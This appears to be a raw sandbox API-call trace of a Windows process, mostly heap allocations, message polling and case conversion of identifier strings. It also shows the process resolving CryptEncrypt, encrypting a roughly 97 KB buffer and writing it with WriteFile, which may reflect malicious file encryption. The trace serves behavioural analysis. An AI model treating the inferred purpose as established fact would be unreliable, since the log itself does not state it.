1 [0149.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0149.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0149.549] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0149.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0149.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0149.550] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0149.550] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0149.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0149.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0149.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.550] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74868 | out: hHeap=0x2af0000) returned 1 [0149.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0149.550] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.551] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.551] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.551] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0149.551] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.551] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.551] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0149.551] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.551] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0149.551] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0149.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d7ba0 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.555] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa3f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.556] CryptEncrypt (in: hKey=0x9e1b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x17b50, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x17b58) returned 1 [0149.556] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.556] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.556] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.556] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.556] CharLowerBuffW (in: lpsz="byte[97112]", cchLength=0xb | out: lpsz="byte[97112]") returned 0xb [0149.558] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.598] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.598] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.598] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.598] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.598] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.598] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.600] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa3a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.601] CryptEncrypt (in: hKey=0x9e1b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d7ba0*, pdwDataLen=0x8cef60*=0x17b50, dwBufLen=0x17b58 | out: pbData=0x37d7ba0*, pdwDataLen=0x8cef60*=0x17b58) returned 1 [0149.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.607] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.607] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.607] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.607] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.607] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.607] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.607] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.607] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.607] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.607] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.607] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.608] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.608] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.608] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.608] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.608] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.608] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.608] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.608] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.608] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.621] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.621] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.621] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.622] WriteFile (in: hFile=0x4fc, lpBuffer=0x2ac6f70*, nNumberOfBytesToWrite=0x17b58, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ac6f70*, lpNumberOfBytesWritten=0x8cf5e4*=0x17b58, lpOverlapped=0x0) returned 1 [0149.632] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.632] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.632] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0149.632] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.632] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0149.632] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.632] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.632] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.633] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0149.633] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.633] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0149.634] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0149.634] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 